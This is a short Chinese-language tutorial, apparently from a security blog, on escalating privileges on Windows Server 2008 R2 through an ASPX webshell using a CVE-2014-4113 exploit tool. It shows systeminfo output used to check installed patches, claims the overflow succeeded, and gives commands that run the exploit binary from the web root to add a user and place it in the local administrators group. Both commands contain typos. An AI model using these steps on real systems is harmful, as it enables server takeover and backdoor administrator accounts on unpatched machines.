摘要
1、简介
在winserver2008 r2 中 服务器默认是支持aspx的。所以默认都是可以执行一些命令。
如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。
2、CVE-2014-4113-Exploit
这个版本的提权工具 可以对winserver2008 的系统进行溢出提权
3、实战
systeminfo 这个命令查看系统信息的
主机名: WIN-HRKJ54V1GSJ
OS 名称: Microsoft Windows Web Server 2008 R2
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: MicrosoftCorporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 00500-001-0000635-84743
初始安装日期: 2019/3/3, 16:24:34
系统启动时间: 2019/4/7, 17:14:40
系统制造商: VMware, Inc.
系统型号: VMware7,1
系统类型: x64-based PC
处理器: 安装了 2 个处理器。
[01]: Intel64 Family 6 Model94 Stepping 3 GenuineIntel ~3408 Mhz
[02]: Intel64 Family 6 Model94 Stepping 3 GenuineIntel ~3408 Mhz
BIOS 版本: VMware, Inc.VMW71.00V.6997262.B64.1710270607, 2017/10/27
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 4,095 MB
可用的物理内存: 2,939 MB
虚拟内存: 最大值: 8,188 MB
虚拟内存: 可用: 6,603 MB
虚拟内存: 使用中: 1,585 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: 暂缺
修补程序: 安装了 2 个修补程序。
[01]: KB2999226
[02]: KB976902
网卡: 安装了 1 个 NIC。
[01]: Intel(R) 82574L GigabitNetwork Connection
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: 192.168.0.105
[02]:fe80::986d:3564:19ad:2447
溢出成功
如果找不到可写目录 可以 使用遍历可写目录的脚本进行查找
增加用户
/c C:\inetpub\wwwroot\www.demo1.com\Win64.exe "net moonsec moonsec /add"
增加到用户组
/c C:\inetpub\wwwroot\www.demo1.com\Win64.exe "net localgroup administratorsmoonsec /add"
您可以选择一种方式赞助本站支付宝转账赞助
分享到各大网站